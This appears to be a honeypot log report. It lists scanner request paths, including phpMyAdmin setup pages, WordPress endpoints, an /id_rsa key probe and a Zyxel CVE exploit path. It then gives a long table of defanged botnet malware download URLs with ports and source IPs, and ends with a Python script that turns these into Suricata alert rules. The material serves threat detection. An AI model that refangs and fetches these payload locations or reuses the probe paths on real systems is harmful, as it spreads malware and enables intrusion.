/phpMyAdmin-2.5.6-rc1/ phpMyAdmin - -
/phpMyAdmin-2.5.6-rc2/ phpMyAdmin - -
/phpMyAdmin-2.5.6/ phpMyAdmin - -
/phpMyAdmin-2.5.7-pl1/ phpMyAdmin - -
/phpMyAdmin-2.5.7/ phpMyAdmin - -
/phpMyAdmin-2.6.0-alpha/ phpMyAdmin - -
/phpMyAdmin-2.6.0-alpha2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-beta1/ phpMyAdmin - -
/phpMyAdmin-2.6.0-beta2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.0-pl2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-pl3/ phpMyAdmin - -
/phpMyAdmin-2.6.0-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.0-rc2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-rc3/ phpMyAdmin - -
/phpMyAdmin-2.6.0/ phpMyAdmin - -
/phpMyAdmin-2.6.1-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.1-pl2/ phpMyAdmin - -
/phpMyAdmin-2.6.1-pl3/ phpMyAdmin - -
/phpMyAdmin-2.6.1-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.1-rc2/ phpMyAdmin - -
/phpMyAdmin-2.6.1/ phpMyAdmin - -
/phpMyAdmin-2.6.2-beta1/ phpMyAdmin - -
/phpMyAdmin-2.6.2-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.2-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.2/ phpMyAdmin - -
/phpMyAdmin-2.6.3-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.3-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.3/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl2/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl3/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl4/ phpMyAdmin - -
/phpMyAdmin-2.6.4-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.4/ phpMyAdmin - -
/phpMyAdmin-2.7.0-beta1/ phpMyAdmin - -
/phpMyAdmin-2.7.0-pl1/ phpMyAdmin - -
/phpMyAdmin-2.7.0-pl2/ phpMyAdmin - -
/phpMyAdmin-2.7.0-rc1/ phpMyAdmin - -
/phpMyAdmin-2.7.0/ phpMyAdmin - -
/phpMyAdmin-2.8.0-beta1/ phpMyAdmin - -
/phpMyAdmin-2.8.0-rc1/ phpMyAdmin - -
/phpMyAdmin-2.8.0-rc2/ phpMyAdmin - -
/phpMyAdmin-2.8.0.1/ phpMyAdmin - -
/phpMyAdmin-2.8.0.2/ phpMyAdmin - -
/phpMyAdmin-2.8.0.3/ phpMyAdmin - -
/phpMyAdmin-2.8.0.4/ phpMyAdmin - -
/phpMyAdmin-2.8.0/ phpMyAdmin - -
/phpMyAdmin-2.8.1-rc1/ phpMyAdmin - -
/phpMyAdmin-2.8.1/ phpMyAdmin - -
/phpMyAdmin-2.8.2/ phpMyAdmin - -
/phpMyAdmin-2/ phpMyAdmin - -
/phpMyAdmin2/ phpMyAdmin - -
/phpmanager/ phpMyAdmin - -
/phpmy-admin/ phpMyAdmin - -
/script - - -
/sqlmanager/ SQLiteManager - -
/sqlweb/ SQL - -
/systemInfo Unknown - -
/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php SQLiteManager - -
/webadmin/ SQL - -
/webdb/ SQL - -
/websql/ SQL - -
hxxp://www[.]msftncsi[.]com/ncsi[.]txt Unauthorized Relay - -
/.html - - -
hxxp://110[.]249[.]212[.]46/testget Unauthorized Relay - -
hxxp://5[.]188[.]210[.]101/echo.php Unauthorized Relay - -
/id_rsa ssh - -
/smb_scheduler/ SimBankSchedulerServer - https://docuri.com/download/smb-server-install-guide_59c1dfd7f581710b2869684b_pdf
/user// - - -
/user//wp-json/wp/v2/users/ WordPress - -
/user/wp-login.php WordPress - -
/user/xmlrpc.php WordPress - -
/Nmap/folder/check1562208120 Nmap - -
/NmapUpperCheck1562208120 Nmap - -
/nmaplowercheck1562208120 Nmap - -
/user/soapCaller.bs Morfeus Fucking Scanner - https://kaworu.jpn.org/kaworu/2008-12-27-1.php
hxxp://160[.]16[.]145[.]183/QUERY/en-us/msdn/ Unauthorized Relay - -
/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup Zyxel CVE-2017-6884 https://www.exploit-db.com/exploits/41782
/myadmin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/phpmyadmin/scripts/setup.php phpMyAdmin - -
/pma/scripts/setup.php phpMyAdmin - -


<Malware download>

Destination port  Download URL  Source IP
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 167[.]99[.]99[.]163
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 159[.]203[.]65[.]214
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 159[.]203[.]4[.]33
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 138[.]68[.]58[.]92
52869 hxxp://91[.]209[.]70[.]174/Corona[.]mips 185[.]244[.]25[.]92
52869 hxxp://174[.]128[.]226[.]101/kr 107[.]173[.]222[.]169
52869 hxxp://174[.]128[.]226[.]101/kr 198[.]23[.]214[.]17
6379 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
8161 lsd[.]systemten[.]org 160[.]16[.]221[.]15
52869 hxxp://174[.]128[.]226[.]101/kr 107[.]173[.]222[.]169
6379 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 113[.]141[.]72[.]248
60001 hxxp:/\/185[.]244[.]25[.]185/bins/Jaws[.]sh 109[.]238[.]12[.]68
6381 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
52869 hxxp://185[.]142[.]236[.]205/wrgjwrgjwrg246356356356/hmips 178[.]62[.]220[.]251
8161 lsd[.]systemten[.]org 160[.]16[.]221[.]15
6380 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
6378 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
8161 lsd[.]systemten[.]org 160[.]16[.]50[.]150
8161 lsd[.]systemten[.]org 160[.]16[.]79[.]209
37215 178[.]62[.]112[.]14 105[.]156[.]57[.]15
8161 lsd[.]systemten[.]org 160[.]16[.]134[.]40
8161 lsd[.]systemten[.]org 160[.]16[.]202[.]252
8161 lsd[.]systemten[.]org 160[.]16[.]204[.]135
8161 lsd[.]systemten[.]org 160[.]16[.]91[.]228
37215 hxxp://195[.]201[.]235[.]173 174[.]138[.]5[.]118
8161 lsd[.]systemten[.]org 160[.]16[.]50[.]150
8161 lsd[.]systemten[.]org 160[.]16[.]79[.]209
37215 174[.]128[.]226[.]101 107[.]173[.]222[.]169
37215 199[.]38[.]245[.]220 68[.]195[.]29[.]77
60001 hxxp:/\/185[.]172[.]110[.]226/lmaoWTF/Jaws[.]sh 185[.]172[.]110[.]226
801 hxxp://fid[.]hognoob[.]se/download[.]exe 196[.]229[.]36[.]164
801 hxxp://fid[.]hognoob[.]se/download[.]exe 196[.]229[.]36[.]164
5500 hxxp:/\/178[.]33[.]181[.]23/sh 167[.]86[.]77[.]222
5555 hxxp://185[.]244[.]25[.]241/k 94[.]192[.]84[.]33
5555 hxxp://185[.]99[.]254[.]29/bins/arm7 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/arm7 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/mpsl 104[.]251[.]122[.]37
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 106[.]75[.]6[.]203
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 106[.]75[.]6[.]203
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 58[.]82[.]212[.]148
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 221[.]182[.]115[.]133
8161 lsd[.]systemten[.]org 160[.]16[.]134[.]40
8161 lsd[.]systemten[.]org 160[.]16[.]202[.]252
8161 lsd[.]systemten[.]org 160[.]16[.]204[.]135
8161 lsd[.]systemten[.]org 160[.]16[.]91[.]228
9200 hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 223[.]203[.]201[.]254
37215 178[.]62[.]114[.]122 79[.]24[.]106[.]146
37215 206[.]189[.]17[.]158 46[.]101[.]255[.]19
37215 206[.]189[.]170[.]165 212[.]19[.]119[.]8
37215 89[.]46[.]223[.]195 162[.]252[.]200[.]7
37215 89[.]46[.]223[.]195 79[.]53[.]81[.]185
52869 hxxp://168[.]235[.]89[.]216/IDJAPbins[.]sh 134[.]209[.]114[.]98
52869 hxxp://174[.]128[.]226[.]101/kr 185[.]153[.]180[.]246
60001 hxxp:/\/185[.]244[.]25[.]171/bins/Jaws[.]sh 109[.]238[.]12[.]68
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 219[.]77[.]18[.]91
443 hxxp://fid[.]hognoob[.]se/download[.]exe 182[.]76[.]76[.]206
443 hxxp://fid[.]hognoob[.]se/download[.]exe 182[.]76[.]76[.]206
443 hxxp://fid[.]hognoob[.]se/download[.]exe 182[.]76[.]76[.]206
800 hxxp://fid[.]hognoob[.]se/download[.]exe 197[.]26[.]162[.]168
800 hxxp://fid[.]hognoob[.]se/download[.]exe 197[.]26[.]162[.]168
800 hxxp://fid[.]hognoob[.]se/download[.]exe 197[.]26[.]162[.]168
801 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]81[.]87
801 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]81[.]87
801 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]153[.]210[.]53
801 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]153[.]210[.]53
5555 hxxp://134[.]209[.]183[.]3/z[.]sh 134[.]209[.]18[.]235
5555 hxxp://185[.]244[.]25[.]24/k 151[.]29[.]5[.]219
5555 hxxp://185[.]244[.]25[.]241/k 101[.]51[.]5[.]136
5555 hxxp://185[.]244[.]25[.]241/k 103[.]3[.]224[.]190
5555 hxxp://185[.]244[.]25[.]241/k 104[.]205[.]11[.]120
5555 hxxp://185[.]244[.]25[.]241/k 109[.]116[.]204[.]63
5555 hxxp://185[.]244[.]25[.]241/k 112[.]137[.]35[.]5
5555 hxxp://185[.]244[.]25[.]241/k 116[.]251[.]1[.]72
5555 hxxp://185[.]244[.]25[.]241/k 122[.]138[.]100[.]6
5555 hxxp://185[.]244[.]25[.]241/k 130[.]0[.]189[.]117
5555 hxxp://185[.]244[.]25[.]241/k 151[.]63[.]25[.]250
5555 hxxp://185[.]244[.]25[.]241/k 162[.]40[.]137[.]97
5555 hxxp://185[.]244[.]25[.]241/k 171[.]13[.]150[.]58
5555 hxxp://185[.]244[.]25[.]241/k 171[.]234[.]115[.]32
5555 hxxp://185[.]244[.]25[.]241/k 174[.]49[.]67[.]132
5555 hxxp://185[.]244[.]25[.]241/k 175[.]139[.]77[.]69
5555 hxxp://185[.]244[.]25[.]241/k 176[.]223[.]72[.]122
5555 hxxp://185[.]244[.]25[.]241/k 177[.]105[.]116[.]22
5555 hxxp://185[.]244[.]25[.]241/k 177[.]71[.]59[.]193
5555 hxxp://185[.]244[.]25[.]241/k 180[.]130[.]153[.]49
5555 hxxp://185[.]244[.]25[.]241/k 182[.]253[.]65[.]183
5555 hxxp://185[.]244[.]25[.]241/k 188[.]217[.]185[.]71
5555 hxxp://185[.]244[.]25[.]241/k 188[.]49[.]46[.]158
5555 hxxp://185[.]244[.]25[.]241/k 190[.]12[.]177[.]88
5555 hxxp://185[.]244[.]25[.]241/k 191[.]162[.]43[.]35
5555 hxxp://185[.]244[.]25[.]241/k 197[.]227[.]172[.]131
5555 hxxp://185[.]244[.]25[.]241/k 27[.]76[.]50[.]21
5555 hxxp://185[.]244[.]25[.]241/k 37[.]135[.]73[.]41
5555 hxxp://185[.]244[.]25[.]241/k 37[.]182[.]29[.]57
5555 hxxp://185[.]244[.]25[.]241/k 39[.]77[.]231[.]147
5555 hxxp://185[.]244[.]25[.]241/k 42[.]2[.]209[.]84
5555 hxxp://185[.]244[.]25[.]241/k 42[.]200[.]116[.]26
5555 hxxp://185[.]244[.]25[.]241/k 42[.]52[.]170[.]23
5555 hxxp://185[.]244[.]25[.]241/k 46[.]152[.]121[.]109
5555 hxxp://185[.]244[.]25[.]241/k 70[.]31[.]239[.]253
5555 hxxp://185[.]244[.]25[.]241/k 73[.]89[.]44[.]194
5555 hxxp://185[.]244[.]25[.]241/k 77[.]76[.]180[.]169
5555 hxxp://185[.]244[.]25[.]241/k 78[.]101[.]87[.]97
5555 hxxp://185[.]244[.]25[.]241/k 79[.]111[.]33[.]39
5555 hxxp://185[.]244[.]25[.]241/k 92[.]98[.]237[.]36
5555 hxxp://185[.]70[.]105[.]35/teqbins[.]sh 61[.]216[.]81[.]44
5555 hxxp://185[.]99[.]254[.]29/bins/arm7 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/x86 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/x86 104[.]251[.]122[.]37
5555 hxxp://209[.]97[.]163[.]186/c 112[.]170[.]69[.]163
5555 hxxp://68[.]183[.]39[.]48/icy[.]sh 182[.]254[.]168[.]229
5555 hxxp://87[.]120[.]254[.]184/curl1 185[.]164[.]72[.]227
5555 hxxp://87[.]120[.]254[.]184/curl1 80[.]82[.]70[.]43
6379 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 119[.]253[.]84[.]102
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 123[.]157[.]252[.]90
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 123[.]157[.]252[.]90
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]50[.]59
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]50[.]59
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]107[.]73[.]221
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]107[.]73[.]221
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 177[.]191[.]190[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 177[.]191[.]190[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 183[.]89[.]159[.]107
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 183[.]89[.]159[.]107
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]5[.]245[.]144
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]5[.]245[.]144
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]55[.]142[.]52
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]55[.]142[.]52
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]150[.]178[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]150[.]178[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 221[.]230[.]132[.]58
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 5[.]1[.]38[.]129
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 5[.]1[.]38[.]129
8000 hxxp://209[.]141[.]40[.]213/avtech 209[.]52[.]149[.]41
8000 hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]mips 159[.]203[.]18[.]21
8060 hxxp://fid[.]hognoob[.]se/download[.]exe 165[.]56[.]0[.]30
8080 hxxp://134[.]209[.]183[.]3/akbins/mpsl[.]akira[.]ak 134[.]209[.]28[.]200
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 109[.]124[.]148[.]167
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 121[.]179[.]46[.]82
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 124[.]133[.]108[.]34
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 148[.]63[.]18[.]12
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 182[.]34[.]123[.]90
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 213[.]192[.]56[.]195
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 222[.]218[.]220[.]101
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 46[.]105[.]209[.]48
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 66[.]168[.]88[.]53
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 83[.]29[.]229[.]22
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 93[.]100[.]110[.]69
8080 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]0[.]151[.]173
8080 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]0[.]151[.]173
8080 hxxp://hulo[.]r00ts[.]online/[.]config/Lrep 122[.]116[.]216[.]224
8080 hxxp://hulo[.]r00ts[.]online/FleX/Lrep 118[.]232[.]136[.]122
8080 hxxp://hulo[.]r00ts[.]online/FleX/Lrep 88[.]249[.]249[.]27
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 120[.]236[.]87[.]152
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 120[.]236[.]87[.]152
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 120[.]236[.]87[.]152
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 41[.]226[.]251[.]178
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 41[.]226[.]251[.]178
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 85[.]105[.]111[.]237
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 85[.]105[.]111[.]237
8111 hxxp://fid[.]hognoob[.]se/download[.]exe 40[.]68[.]131[.]225
8111 hxxp://fid[.]hognoob[.]se/download[.]exe 40[.]68[.]131[.]225
8111 hxxp://fid[.]hognoob[.]se/download[.]exe 40[.]68[.]131[.]225
9200 hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 3[.]213[.]101[.]190
9200 hxxp://216[.]176[.]179[.]106:9090/26006\ 202[.]109[.]143[.]110
9888 hxxp://fid[.]hognoob[.]se/download[.]exe 185[.]48[.]149[.]115
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 218[.]62[.]29[.]165
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 218[.]62[.]29[.]165
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 43[.]254[.]125[.]41
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 43[.]254[.]125[.]41
37215 103[.]83[.]157[.]41 142[.]93[.]113[.]113
37215 104[.]248[.]93[.]159 68[.]183[.]151[.]62
37215 157[.]230[.]173[.]232 145[.]239[.]168[.]176
37215 157[.]230[.]173[.]232 37[.]6[.]230[.]115
37215 157[.]230[.]173[.]232 79[.]107[.]238[.]19
37215 157[.]230[.]173[.]232 79[.]107[.]244[.]144
37215 159[.]203[.]21[.]20 77[.]42[.]104[.]114
37215 159[.]65[.]240[.]150 88[.]36[.]135[.]138
37215 159[.]89[.]38[.]57 106[.]13[.]52[.]123
37215 178[.]62[.]112[.]14 60[.]8[.]213[.]120
37215 178[.]62[.]114[.]122 151[.]30[.]69[.]79
37215 178[.]62[.]114[.]122 199[.]182[.]137[.]148
37215 178[.]62[.]114[.]122 212[.]210[.]31[.]47
37215 178[.]62[.]114[.]122 37[.]130[.]113[.]38
37215 178[.]62[.]114[.]122 79[.]12[.]199[.]206
37215 185[.]244[.]25[.]235 149[.]129[.]132[.]231
37215 185[.]244[.]25[.]235 34[.]85[.]97[.]138
37215 185[.]244[.]25[.]235 47[.]92[.]54[.]63
37215 206[.]189[.]170[.]165 151[.]24[.]171[.]42
37215 206[.]189[.]170[.]165 151[.]30[.]33[.]254
37215 206[.]189[.]170[.]165 151[.]30[.]62[.]96
37215 206[.]189[.]170[.]165 151[.]32[.]113[.]220
37215 206[.]189[.]170[.]165 151[.]32[.]61[.]221
37215 206[.]189[.]170[.]165 151[.]52[.]39[.]144
37215 206[.]189[.]170[.]165 151[.]64[.]117[.]217
37215 206[.]189[.]170[.]165 212[.]19[.]112[.]212
37215 206[.]189[.]170[.]165 212[.]19[.]116[.]205
37215 206[.]189[.]170[.]165 79[.]23[.]98[.]90
37215 206[.]189[.]170[.]165 79[.]47[.]184[.]216
37215 206[.]189[.]170[.]165 79[.]52[.]2[.]81
37215 209[.]141[.]43[.]15 220[.]127[.]239[.]7
37215 209[.]97[.]136[.]57 85[.]134[.]12[.]144
37215 37[.]49[.]225[.]230 37[.]202[.]111[.]58
37215 37[.]49[.]225[.]230 37[.]202[.]127[.]16
37215 37[.]49[.]225[.]230 46[.]185[.]139[.]32
37215 68[.]183[.]39[.]48 68[.]183[.]151[.]62
37215 68[.]183[.]39[.]48 68[.]183[.]151[.]62
37215 89[.]190[.]159[.]189 151[.]40[.]20[.]117
37215 89[.]190[.]159[.]189 151[.]49[.]112[.]101
37215 89[.]190[.]159[.]189 152[.]171[.]67[.]142
37215 89[.]190[.]159[.]189 188[.]136[.]243[.]230
37215 89[.]190[.]159[.]189 79[.]46[.]88[.]134
37215 89[.]190[.]159[.]189 80[.]15[.]216[.]26
37215 89[.]34[.]26[.]202 174[.]138[.]0[.]191
37215 89[.]46[.]223[.]195 162[.]255[.]122[.]178
37215 hxxp://213[.]166[.]69[.]64 174[.]138[.]5[.]118
52869 hxxp://174[.]128[.]226[.]101/kr 185[.]101[.]105[.]192
52869 hxxp://185[.]142[.]236[.]205/wrgjwrgjwrg246356356356/hmips 188[.]166[.]48[.]241
52869 hxxp://213[.]166[.]69[.]64/akbins/mips[.]akirag 174[.]138[.]0[.]191
55555 ftp -r 185[.]172[.]110[.]246
60001 hxxp:/\/178[.]33[.]181[.]23/infect 167[.]86[.]77[.]222
60001 hxxp:/\/178[.]33[.]181[.]23/sh 167[.]86[.]77[.]222
60001 hxxp:/\/185[.]172[.]110[.]226/lmaoWTF/Jaws[.]sh 45[.]8[.]159[.]175
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 1[.]4[.]188[.]23
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 101[.]108[.]98[.]16
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 103[.]133[.]64[.]68
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 104[.]205[.]11[.]120
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 108[.]30[.]142[.]74
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 112[.]119[.]70[.]4
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 112[.]243[.]249[.]179
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 113[.]231[.]104[.]95
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 114[.]203[.]95[.]52
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 115[.]96[.]156[.]121
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 118[.]81[.]99[.]146
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 120[.]1[.]136[.]29
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 125[.]26[.]203[.]175
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 151[.]70[.]197[.]241
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 163[.]158[.]203[.]173
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 175[.]151[.]238[.]175
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 178[.]221[.]57[.]209
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 182[.]180[.]121[.]222
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 185[.]18[.]46[.]110
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 188[.]49[.]46[.]158
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 189[.]26[.]196[.]203
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 190[.]221[.]92[.]136
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 191[.]243[.]231[.]64
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 196[.]229[.]230[.]251
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 197[.]0[.]168[.]186
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 2[.]89[.]166[.]11
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 219[.]139[.]232[.]108
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 222[.]72[.]116[.]147
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 27[.]192[.]11[.]108
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 27[.]76[.]50[.]21
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 35[.]199[.]147[.]245
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 37[.]202[.]100[.]185
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 39[.]44[.]40[.]234
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 39[.]45[.]138[.]80
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 41[.]138[.]117[.]19
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 41[.]143[.]237[.]2
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 42[.]53[.]118[.]250
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 5[.]219[.]171[.]187
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 5[.]236[.]217[.]102
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 58[.]10[.]74[.]65
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 61[.]175[.]101[.]165
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 68[.]194[.]230[.]145
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 93[.]46[.]58[.]233
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 93[.]81[.]10[.]51
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 94[.]231[.]164[.]168
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 95[.]137[.]251[.]164
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 95[.]219[.]163[.]24
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 95[.]249[.]151[.]66
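The download table above is only useful once it is machine-readable. The following is an added example, not code from the original post: it parses rows in the page's own format (destination port, defanged download location, defanged source IP), deduplicates the repeated rows, counts detections per targeted port and per download host, and turns the hostname IOCs into Suricata DNS-query rules. Assumptions: `fxp://` is treated as defanged `ftp://`, the sids are assumed free in the local range, and the `dns.query` keyword needs Suricata 4.1 or later. The sample rows are copied from the table above.

```python
"""Parse defanged 'port / download location / source IP' rows into an IOC
summary.  Added example, not code from the original post; standard
library only."""
import re
from collections import Counter
from urllib.parse import urlparse

# Rows copied from the table above.  The duplicate 7001 row is deliberate:
# the table repeats a row once per detection.
SAMPLE_ROWS = r"""
6379 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 119[.]253[.]84[.]102
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 123[.]157[.]252[.]90
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 123[.]157[.]252[.]90
8000 hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]mips 159[.]203[.]18[.]21
37215 103[.]83[.]157[.]41 142[.]93[.]113[.]113
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 1[.]4[.]188[.]23
"""


def refang(value):
    """Undo the defanging used in this log: [.] -> ., the '/\\/' variant of
    '//', hxxp -> http, and fxp -> ftp (assumed meaning of 'fxp')."""
    value = value.replace("[.]", ".").replace(":/\\/", "://")
    schemes = {"hxxp": "http", "fxp": "ftp"}
    return re.sub(r"^(hxxp|fxp)", lambda m: schemes[m.group(1)], value)


def download_host(refanged):
    """Host part of a download location.  A bare IP (as in the port 37215
    rows, where no URL was logged) is returned unchanged."""
    if "://" not in refanged:
        return refanged
    return urlparse(refanged).hostname or refanged


def parse_rows(text):
    """One dict per well-formed row; blank or malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        port, download, src = parts
        url = refang(download)
        rows.append({"port": int(port), "download": url,
                     "host": download_host(url), "src_ip": refang(src)})
    return rows


def summarize(rows):
    """Counts per targeted port and per download host, computed over
    deduplicated (port, download, src_ip) triples so a repeated row counts
    once."""
    unique = {(r["port"], r["download"], r["src_ip"]): r for r in rows}.values()
    return {
        "rows": len(rows),
        "unique": len(unique),
        "by_port": Counter(r["port"] for r in unique),
        "by_host": Counter(r["host"] for r in unique),
    }


def dns_block_rules(hosts, base_sid=9000000):
    """Suricata (4.1+) DNS-query alert rules for hostname IOCs.  Bare IPs
    are skipped: block those at the firewall instead.  base_sid is assumed
    to start an unused local sid range."""
    names = sorted(h for h in hosts if not re.fullmatch(r"[\d.]+", h))
    return [
        f'alert dns $HOME_NET any -> any any (msg:"HONEYPOT IOC DNS query {host}"; '
        f'dns.query; content:"{host}"; nocase; sid:{base_sid + i}; rev:1;)'
        for i, host in enumerate(names)
    ]


if __name__ == "__main__":
    summary = summarize(parse_rows(SAMPLE_ROWS))
    print(summary["unique"], "unique of", summary["rows"], "rows")
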